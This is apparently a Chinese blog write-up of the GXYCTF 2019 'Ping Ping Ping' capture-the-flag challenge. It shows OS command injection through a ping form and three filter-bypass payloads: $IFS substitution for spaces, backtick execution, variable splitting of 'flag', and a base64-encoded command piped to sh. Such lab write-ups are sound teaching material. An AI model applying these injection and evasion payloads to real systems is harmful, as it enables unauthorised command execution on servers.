本文介绍了在GXYCTF2019比赛中的一个挑战,涉及如何通过ping命令执行payload,避开过滤,使用反引号、变量赋值和base64编码技巧来获取flag。作者详细展示了三种不同的解决方案和绕过过滤的方法。
[GXYCTF 2019]Ping Ping Ping wp
关于命令执行相关知识可以看这篇博客:
本文只写做题流程及几种解法。
信息搜集
页面:
毫无疑问,这是一道 ping 命令执行的题。
简单测试一下
127.0.0.1;ls
返回:
说明存在命令执行,且分号没被过滤。
获取 flag
简单测试一下,就会发现过滤了很多东西,比如空格,大括号,“flag” 字符串等等。
用 $IFS$9 代替空格查看一下 index.php 文件内容:
;cat$IFS$9index.php
那么就可以构造以下几种 payload :
payload1:反引号命令执行
;cat$IFS$9`ls`
反引号内的内容会先被当成命令执行,再将执行结果作为外部命令的一部分再去执行。
在这里就是先执行 ls ,结果为 index.php flag.php ,再 cat 查看这些文件。其作用等同于 cat * 查看当前目录下所有文件,但是 ‘*’ 被过滤了。
payload2:变量赋值再使用
;b=ag;a=fl;cat$IFS$1$a$b.php
意思就是将 “ag” 赋值给变量 b ,将 “fl” 赋值给变量 a ,最后拼接起来,$a$b 就是 “flag” ,这样就绕过了对 “flag” 字符串的检测。
$IFS$1 也是用于替换空格。
payload3:base64 编码
;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
其中 Y2F0IGZsYWcucGhw 就是 cat flag.php 的 base64 编码。
“|” 是管道符,将上一条命令输出的结果作为下一条命令的输入。
base64 -d 是 Linux 中用于将字符串进行 base64 解码的命令。
sh 用于执行 shell 命令。
以此方式达成用 sh 命令执行 cat flag.php 的效果。
其实与之相似的 payload 还有:
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash
但是 bash 被过滤了。
flag 在源码里
执行以上命令后,去源码里找 flag :
2479
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
